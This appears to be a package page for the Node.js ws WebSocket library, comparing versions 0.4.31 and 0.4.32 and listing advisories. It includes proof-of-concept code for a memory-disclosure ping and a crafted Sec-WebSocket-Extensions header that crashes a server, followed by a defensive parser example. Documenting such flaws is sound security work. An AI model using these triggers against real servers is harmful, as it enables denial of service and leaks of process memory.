The ws package, a popular choice for WebSocket communication in Node.js, saw an update with version 0.4.32 following version 0.4.31. Both versions aim to provide a simple, fast, and tested solution for WebSocket client, server, and console applications, adhering to RFC 6455. A key difference lies in the dependencies: version 0.4.32 upgrades the "nan" dependency from "~0.3.0" to "~1.0.0", which matters because nan is a native abstraction layer used to support multiple versions of Node.js. The "commander" dependency is also upgraded, from "~0.6.1" to "~2.1.0". Both versions share the same core principles championed by author Einar Otto Stangvik. Developers relying on ws should note these dependency updates, particularly the nan upgrade, as it might affect compatibility with older Node.js versions or with native modules that depend on earlier nan interfaces. The release dates also show a gap of almost a year between the two versions, suggesting other minor improvements or bug fixes that are not documented in the metadata provided. Before upgrading, consider the impact on performance and on compatibility with other libraries, and check the release notes if available. Both versions include the same devDependencies.
All vulnerabilities related to version 0.4.32 of the package
Remote Memory Disclosure in ws

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability. In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
var ws = require('ws')
var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes
  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client: the echoed 50-byte buffer, which may contain stale memory.
  })
})
Update to version 1.0.1 or greater.
DoS due to excessively large websocket message in ws

Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.

Update to version 1.1.1 or later. Alternatively, set the maxPayload option for the ws server to a value smaller than 256MB.
Denial of Service in ws

Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');

// Start a server, then send it a raw upgrade request whose extension name
// is an Object.prototype property; affected versions crash while parsing it.
const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'
  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
Update to version 3.3.1 or later.
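The crash above comes from keying parsed extension names on a plain object, where a name such as constructor is already present through the prototype chain. The following added example, which is not code from the ws project, shows the defensive parsing pattern for a Sec-WebSocket-Extensions header: a null-prototype object for the parsed table and own-property checks only, so prototype property names become ordinary keys. The function names and the sample headers are assumptions made for this illustration.

```javascript
// Added example, not code from the ws project. Parses a
// Sec-WebSocket-Extensions header (RFC 6455 section 9.1) into
//   { extName: [ { param: [value, ...], ... }, ... ] }
// Null-prototype objects are used so extension or parameter names such as
// "constructor" or "__proto__" are plain keys rather than inherited
// properties of Object.prototype.
function parseExtensions(header) {
  const extensions = Object.create(null);
  for (const rawExt of String(header).split(',')) {
    const parts = rawExt.split(';');
    const name = parts.shift().trim();
    if (!name) continue; // empty names (e.g. the ",;constructor" variant) are skipped, not dereferenced
    const params = Object.create(null);
    for (const rawParam of parts) {
      const param = rawParam.trim();
      if (!param) continue;
      const eq = param.indexOf('=');
      const key = (eq === -1 ? param : param.slice(0, eq)).trim();
      if (!key) continue;
      const value = eq === -1 ? true : param.slice(eq + 1).trim();
      // Own-property check only: a key exists only if this parser put it there.
      if (!Object.prototype.hasOwnProperty.call(params, key)) params[key] = [];
      params[key].push(value);
    }
    if (!Object.prototype.hasOwnProperty.call(extensions, name)) extensions[name] = [];
    extensions[name].push(params);
  }
  return extensions;
}

// Contrast: with a plain object literal, "constructor" is already truthy via
// the prototype chain, so a presence check passes and a later `.push` on it
// throws a TypeError, which is the crash the advisory describes.
function inheritedLookupIsTruthy(name) {
  const table = {};
  return Boolean(table[name]);
}

// Constructed sample headers, including the advisory's crash trigger.
const sampleHeaders = [
  'permessage-deflate; client_max_window_bits',
  'constructor',
  ',;constructor',
  '__proto__; constructor=1',
];

for (const header of sampleHeaders) {
  console.log(JSON.stringify(header), '->', Object.keys(parseExtensions(header)));
}
```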